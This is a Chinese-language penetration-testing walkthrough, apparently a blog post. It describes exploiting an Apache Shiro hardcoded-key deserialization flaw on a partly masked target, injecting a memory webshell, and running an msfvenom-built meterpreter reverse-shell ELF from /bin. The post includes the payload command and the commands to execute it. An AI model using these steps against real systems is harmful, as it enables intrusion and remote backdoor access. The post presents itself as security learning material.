Shiro反序列化內網上線

說明：
此貼僅分享用於各安全人員進行安全學習提供思路，或有合法授權的安全測試，請勿參考用於其他用途，如有，後果自負。
感謝各位大佬的關注

目標：152.xxx.xxx.xxx
目的：通過資訊收集或其他方式尋找到了一枚shiro反序列化的漏洞，並進行了內網滲透測試工作
類型：Web反序列化漏洞

介紹：
Shiro 是 Java安全框架通過序列化，進行AES密鑰做身份驗證加密（cookie加密）通過shiro硬編碼比證密鑰獲取目標利用鏈並進行上線操作

本文的起因是在一次滲透測試中，挖掘到了一個shiro反序列化故進行了內網滲透嘗試

特徵：
在請求消息中構造cookie
添加一個參數rememberMe=xxx,觀察響應消息頭中的Set-Cookie是否有rememberMe=deleteMe;如果有則說明使用了shiro框架

資訊收集

這裡我採用的是網路空間測繪引擎、目錄資訊收集、域名收集等進行了資產整合利用

將搜集的資訊導出整合數據備用

利用檢測工具減少誤判率

這裡我用的是java開發的shiroScan 檢測工具
*掃之前記得開代理查詢當前代理IP

在當前目錄下開始對目標進行掃描再次篩選存活並可利用的網站

將篩選結果導出保存

漏洞利用

這邊我利用shiro利用工具對目標進行」硬編碼「密鑰爆破操作

這裡我用的是java開發的shiro利用工具
篩選目標時發現目標存在Shiro反序列化漏洞採用了硬編碼

在工具內進行功能區的利用，在爆破完成後，對目標進行目錄掃描。【記得開代理】
kali中開個小代理

2.這邊對目標進行目錄收集

3.這邊當即對目標目錄進行記憶體馬注入操作
拓展一下：
記憶體馬 是無文件滲透測試的一種常用手段
webshell的變遷過程大致如下所述：
web伺服器管理頁面——> 大馬——>小馬拉大馬——>一句話木馬——>加密一句話木馬——>加密記憶體馬
因為傳統的文件上傳的webshll或以文件形式駐留的後門越來越容易被檢測到，故記憶體馬使用越來越多

這邊我使用蟻劍嘗試連接成功

在蟻劍的命令行中執行查詢命令時發現該目標是root用戶 Linux系統 初步判斷是Debian

目標上線

這裡開始利用 metasploit 安全漏洞檢測工具中的_msfvenom payload生成器 _使目標上線

msfvenom生成 Linux 後門程式，這裡剛開始我是使用的cobalt strike 中生成的Java後門程式發現行不通可能是因為目標JDK的版本導致不兼容的原因，故利用metasploit的msfvenom生成後門程式結合「蟻劍」上傳後門程式使目標成功進行執行上線操作

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=[lhost_ip] lport=22715 -f elf -o 123.elf

將生成的後門程式上傳至目標並利用蟻劍的命令行執行此文件記得改文件執行許可權
chmod 777 123.elf;
chmod u+x 123.elf;
./123.elf 執行文件

後門程式「123.elf」成功上傳至目標/bin目錄下